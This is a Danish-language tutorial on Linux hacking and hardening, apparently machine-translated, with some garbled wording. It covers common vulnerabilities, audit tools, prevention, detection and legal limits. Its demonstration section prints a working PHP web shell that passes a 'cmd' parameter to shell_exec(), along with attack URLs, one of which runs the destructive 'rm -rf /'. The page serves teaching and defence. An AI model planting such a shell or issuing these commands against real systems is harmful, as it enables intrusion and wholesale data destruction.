Linux hacking-vejledning: Ubuntu Kommandoer og værktøjer

⚡ Smart opsummering

Linux-hacking er praksissen med at finde og udnytte svagheder i Linux-systemer, og denne side forklarer de sårbarheder, som angribere er målrettet mod, de involverede revisionsværktøjer og de kontroller, der holder en server beskyttet.

  • ???? Hvorfor det er vigtigt: Linux kører de fleste webservere og cloud-arbejdsbelastninger, hvilket gør det til et værdifuldt mål.
  • 🔍 Open source-afvejning: Offentlig kildekode hjælper vedligeholdere med hurtige opdateringer og hjælper angribere med at finde fejl.
  • 🧰 Revisionsværktøjer: Nessus, Nmap, Lynis og OpenVAS afslør åbne porte, manglende programrettelser og svag konfiguration.
  • ???? Angrebsvektorer: Svage SSH-legitimationsoplysninger, uopdateringer fra kerner, forkert konfiguration og webshells er årsagen til de fleste kompromitteringer.
  • 🛡️ hærdning: Patch-administration, SSH-hærdning, least privilege og obligatorisk adgangskontrol reducerer eksponeringen kraftigt.
  • ???? Opdagelse: Revisionslogfiler, filintegritetstjek og indtrængningsdetektion afslører et brud, før skaden spreder sig.

Linux Hacking-vejledning

Linux er det mest udbredte serveroperativsystem, især til webservere. Det er open source, hvilket betyder, at alle kan læse kildekoden. Denne gennemsigtighed går begge veje: Vedligeholdere bruger det til hurtigt at finde og rette fejl, mens angribere studerer den samme kode og leder efter svagheder, de kan udnytte. Linux-hacking er praksissen med at udnytte disse svagheder til at få uautoriseret adgang til et system.

Afsnittene nedenfor dækker, hvad Linux er, de sikkerhedssårbarheder, der påvirker det, et praktisk kig på hacking med Ubuntu, og de modforanstaltninger, du kan iværksætte.

Hurtig note om Linux

Linux er et open source-operativsystem. Mange distributioner er bygget på det, herunder Red Hat Enterprise Linux, Fedora, Debian og UbuntuFordi kildekoden er publiceret, kan forskere, leverandører og angribere alle inspicere den. Angribere bruger denne adgang til at lede efter fejl, der kan udnyttes, mens den samme synlighed giver vedligeholdere mulighed for at levere rettelser hurtigere end lukkede platforme ofte formår. Linux kører som et server-, desktop-, tablet- eller mobilenhedsoperativsystem.

Linux-programmer kan betjenes via en grafisk brugerflade eller fra kommandolinjen. Kommandolinjearbejde er hurtigere og mere præcist end at klikke sig igennem en GUI, hvilket er grunden til, at sikkerhedstestere, der arbejder på distributioner som f.eks. Kali Linux bruger næsten al deres tid i en terminal. At kende de grundlæggende kommandoer er derfor en praktisk forudsætning.

Se dette Linux tutorial for det grundlæggende, og for Kali Linux tutorial for den sikkerhedsfokuserede distribution, der er bygget oven på dem.

Almindelige Linux-sikkerhedssårbarheder og angrebsvektorer

Angreb på Linux er sjældent afhængige af eksotiske udnyttelser. Telemetri offentliggjort i 2025 og 2026 viser, at de fleste kompromitteringer tractilbage til et lille sæt tilbagevendende svagheder, og at kende dem fortæller dig, hvor du skal bruge defensive indsatser først.

  • Svage eller genbrugte SSH-legitimationsoplysninger — brute-force og forsøg på at stuffing af legitimationsoplysninger mod internetvendt SSH tegner sig for størstedelen af ​​den fjendtlige aktivitet, der observeres på Linux-endpoints.
  • Ikke-patchede kerne- og pakkefejl — Linux-kerneteamet blev en CVE-nummereringsmyndighed i 2024, og rapporterede kerne-CVE'er steg fra cirka 290 i 2023 til mere end 3,500 året efter, så patch-efterslæb ophobes hurtigt.
  • Fejlkonfiguration — standardkonti, unødvendige dæmoner, filer, der kan skrives i hele verden, og tilladte sudo-regler uddeler privilegier, som der ikke krævedes nogen udnyttelse for at opnå.
  • Sårbare webapplikationer — mangler såsom SQL-indsprøjtning og cross-site scripting lader en angriber nå serveren gennem applikationen i stedet for operativsystemet. Web shells er den mest almindelige ondsindede artefakt, der findes på kompromitterede Linux-servere.
  • Fejl i eskalering af rettigheder — lokale fejl, der gør en begrænset konto til root. Nogle har overlevet uopdaget i kernen i mere end et årti før afsløringen.
  • Forsyningskæde- og afhængighedsrisiko — tredjepartspakker, sprogbiblioteker og containerbilleder henter kode, som ingen i driftsteamet har gennemgået.

Ingen af ​​disse kræver, at en angriber besejrer selve Linux. Analyser af indbrud i 2025 viste, at omtrent fire ud af fem ikke involverede malware overhovedet, men i stedet var afhængige af fejlkonfiguration og stjålne legitimationsoplysninger.

Linux hacking værktøjer

Sikkerhedstestere og systemadministratorer bruger de samme scannere: den ene side for at finde svagheder, før en angriber gør det, den anden for at bekræfte, at rettelserne holder. Værktøjerne nedenfor er dem, der oftest bruges til at revidere en Linux-vært.

Værktøj Type Licens Typisk brug på Linux
Nessus Sårbarhedsscanner Kommerciel Scanner konfigurationsindstillinger, manglende programrettelser og netværkstjenester på tværs af blandede miljøer.
Nmap Netværks- og portscanner Open source Identificerer værter, der kører på en server, de tjenester, de eksponerer, og hvilke porte der er åbne.
LYNIS Vært revision og hærdning Open source Reviderer et kørende system i forhold til hærdningsbenchmarks og rapporterer specifikke afhjælpningstrin.
OpenVAS Sårbarhedsscanner Open source Scanning af netværkssårbarheder, vedligeholdt af Greenbone som en del af deres Community Edition.

Listen er ikke udtømmende; den giver en idé om de værktøjer, der er tilgængelige til revision. Ubuntu og andre Linux-systemer. Ældre guider anbefaler stadig SARA, Security Auditor's Research Assistant, men den endelige udgivelse stammer fra 2009, og dens projektside er offline, så Lynis og OpenVAS er de opretholdte alternativer.

Hackingaktivitet: Hack a Ubuntu Linux-system ved hjælp af PHP

I dette praktiske scenarie vil vi se på, hvordan en Linux-vært kan nås via en webapplikation, ved hjælp af PHP som eksempel. Intet levende offer er målrettet. Hvis du vil prøve det, skal du installere LAMPP, Linux-versionen af ​​XAMPP, på din egen maskine.

PHP leveres med to funktioner, der kan bruges til at køre operativsystemkommandoer: exec() og shell_exec(). Funktionen exec() returnerer den sidste linje af kommandoens output, mens shell_exec() returnerer hele resultatet af kommandoen som en streng.

Til demonstrationsformål kan vi antage, at en angriber formår at uploade følgende fil til en webserver.

<?php

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "executing shell command:-> $cmd</br>";

$output = shell_exec($cmd);

echo "<pre>$output</pre>";

?>

HER,

Ovenstående script tager kommandoen fra GET-variablen cmd. Kommandoen udføres ved hjælp af shell_exec(), og resultatet returneres i browseren.

Ovenstående kode kan udnyttes ved hjælp af følgende URL

http://localhost/cp/konsole.php?cmd=ls%20-l

HER,

  • “…konsole.php?cmd=ls%20-l” tildeler værdien ls –l til variablen cmd.

Kommandoen på Ubuntu serveren udføres derfor som

shell_exec('ls -l') ;

Udførelse af ovenstående kode på en webserver giver et resultat, der ligner det følgende.

Browseroutput fra et PHP-script, der viser mappeindhold og filtilladelser på en Ubuntu server

Outputtet viser blot filerne i den aktuelle mappe og deres tilladelser.

Antag nu, at angriberen i stedet sender følgende kommando.

rm -rf /

HER,

  • "rm" fjerner filer.
  • "rf" får rm-kommandoen til at køre i rekursiv tilstand og sletter alle mapper og filer.
  • "/" instruerer kommandoen til at starte sletning fra rodmappen.

Angrebet URL ville se nogenlunde sådan ud

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Én uvalideret parameter er derfor nok til at give en angriber de rettigheder, som webserverkontoen har. De to afsnit, der følger, eksisterer for at forhindre dette i at ske, og for at fange det, når forebyggelsen mislykkes.

Sådan forhindrer du Linux-hacks

Linux-hacking udnytter sårbarheder i operativsystemet og i den software, der kører ovenpå det. En organisation kan anvende følgende kontroller, anvendt samlet, for at lukke de fleste af de ovenfor beskrevne åbninger.

  • Patch management — programrettelser retter de fejl, som angribere udnytter til at kompromittere et system. En defineret politik sikrer, at relevante opdateringer implementeres med det samme i stedet for når nogen husker det.
  • Korrekt OS-konfiguration — deaktiver inaktive brugerkonti og unødvendige dæmoner. Skift standardindstillinger, herunder standardbrugernavne, adgangskoder til delte programmer og standardportnumre.
  • SSH-hærdning — deaktiver root-login og adgangskodegodkendelse, tillad kun navngivne brugere eller grupper, og begrænsning af genforsøg på godkendelse. Dette lukker det mest angrebne indgangspunkt på Linux.
  • Mindste privilegium — giv kun konti og tjenester de rettigheder, de har brug for, og begræns sudo til specifikke kommandoer i stedet for generel administrativ adgang.
  • Obligatorisk adgangskontrol — behold SELinux (Red Hat-familien) eller AppArmor (Debian og Ubuntu) i håndhævelsestilstand, så en kompromitteret tjeneste ikke kan nå resten af ​​systemet.
  • Input validering — demonstrationen ovenfor virker kun, fordi anmodningsdata når en shell-funktion. Send aldrig brugerinput til exec() eller shell_exec().
  • Firewalls og segmentering — eksponér kun de porte, som en tjeneste reelt har brug for, ved hjælp af en firewall og netværkssegmentering for at begrænse, hvad en kompromitteret vært kan nå.
  • Systemer til registrering af indtrængen — sådanne værktøjer kan bruges til at opdage uautoriseret adgang til systemet, og nogle kan også blokere forsøget.
  • Testede sikkerhedskopier — offline, gendannelige sikkerhedskopier forvandler en destruktiv kommando som den ovenfor til et afbrydelse snarere end et permanent tab.

Sådan opdager du et kompromitteret Linux-system

Forebyggelse mislykkes i sidste ende, så det andet spørgsmål er, hvor hurtigt du vil bemærke det. Detektion på Linux afhænger af at indsamle de rigtige beviser før en hændelse, ikke efter en.

  • Revisionslogning — kernel audit framework, auditd, registrerer brug af rettigheder, filadgang og systemkald i en form, som en kompromitteret proces ikke stille og roligt kan omskrive. Videresend disse logfiler fra værten til en central indsamler.
  • Godkendelseslogfiler — en række fejl efterfulgt af en enkelt succes i /var/log/auth.log eller /var/log/secure er den klassiske brute-force-signatur.
  • Uventede processer og forbindelser — en lyttetjeneste eller udgående forbindelse, som ingen kan redegøre for, fortjener øjeblikkelig undersøgelse.
  • Overvågning af filintegritet — værktøjer, der hasher systembinære filer og konfigurationsfiler, og som markerer ændringer i filer, der aldrig burde ændres.
  • Planlagte opgaver og opstartselementer — persistens lander normalt i cron-job, systemd-enheder eller shell-profilscripts.
  • Nye eller ændrede konti — se efter ukendte brugere, enhver anden konto med UID 0 og SSH-nøgler, som ingen har tilføjet.
  • Webservermapper — fordi web shells er den mest almindelige skadelige fil, der findes på Linux-servere, fortjener uventede scriptfiler under en webrod nøje opmærksomhed.
  • Planlagte revisioner — Kør et værtsrevisionsværktøj som Lynis efter en tidsplan og behandl hver rapport som en arbejdsliste i stedet for en engangsøvelse.

Hvis du finder beviser på en kompromitteret situation, skal du isolere værten, gemme logfilerne og et diskbillede, før du ændrer noget, og genopbygge fra et kendt, fungerende medie i stedet for at forsøge at rense et kørende system. Bevishåndteringssiden af ​​dette arbejde er dækket i digitale forensics.

Juridiske og etiske grænser for Linux-hacking

Alle teknikker på denne side er lovlige at praktisere på systemer, du ejer eller har skriftlig tilladelse til at teste, og ulovlige næsten alle andre steder. Ovenstående øvelse kører bevidst imod en lokal installation af netop den grund.

  • Skriftlig bemyndigelse — et underskrevet omfang, et aftalt testvindue og en navngiven kontaktperson er det, der adskiller en penetrationstest fra en lovovertrædelse. Mundtlig godkendelse er ikke nok.
  • Hold dig inden for rækkevidde — værter, adresseintervaller og teknikker, der ikke er angivet, er ikke tilladt, selv når de er tilgængelige.
  • Håndter data forsigtigt — bevismateriale indsamlet under en test indeholder stadig reelle personoplysninger og skal opbevares sikkert og destrueres bagefter.
  • Rapportér ansvarligt — oplys ejeren om fundene og giv tid til en udbedring, før noget offentliggøres.

Den juridiske risiko er reel: uautoriseret adgang til et computersystem er en strafbar handling i henhold til love som den amerikanske Computer Fraud and Abuse Act og den britiske Computer Misuse Act. Hvis du vil bygge en karriere på disse færdigheder, skal du vælge en anerkendt vej – en sikkerhedscertificering plus et laboratorium du ejer, i stedet for en andens server.

Ofte Stillede Spørgsmål

Linux drager fordel af streng brugeradskillelse og en mindre angrebsflade på desktops, så det ser langt mindre almindelig malware. Servereksponering er en anden historie - internetvendte Linux-værter angribes konstant, og konfigurationskvaliteten afgør resultatet.

Signaturscanning hjælper på fil- og mailservere, der håndterer indhold til andre platforme. For de fleste Linux-værter leverer patching, hardening og logbaseret detektion mere værdi, da størstedelen af ​​indtrængen slet ikke involverer nogen malwarefil.

Maskinlæring modellerer baseline normale processer, login og netværksadfærd på en vært og markerer derefter afvigelser, som faste regler overser – såsom en webserverkonto, der starter en shell. Angribere bruger de samme teknikker til at fremskynde rekognoscering, så begge sider er i bevægelse.

GitHub Copilot kan foreslå parameteriserede forespørgsler og sikrere alternativer til shell-kald, når de bliver spurgt direkte. Den træner på offentlig kode, så forslag skal stadig gennemgås — behandl den som en førstekladdeassistent, ikke en sikkerhedsscanner.

Begge er Debian-baserede, men Kali Linux leverer hundredvis af forudinstallerede sikkerheds- og retsmedicinske værktøjer og er bygget til testarbejde. Ubuntu er en generel desktop- og serverdistribution og er det bedre valg til daglig brug.

Installer sikkerhedsopdateringer mindst månedligt og inden for få dage for alt, der er vurderet som kritisk eller kendt for at være udnyttet. Aktiver uovervågede sikkerhedsopgraderinger, og planlæg genstarter, så kernerettelser rent faktisk træder i kraft.

Start med en Linux-administrationslegitimation såsom LPIC eller RHCSA, tilføj CompTIA Security+, og gå derefter videre til praktisk penetrationstestning eller administration. tracks. Guru99 fører en liste over cybersikkerhedscertificeringer med nuværende krav.

Brug en virtuel maskine på din egen hardware eller en godkendt træningsplatform som f.eks. PrøvHackMe, hvor målene er angivet til netop dette formål. Test aldrig et system, du ikke ejer, uden skriftlig tilladelse.

Opsummer dette indlæg med: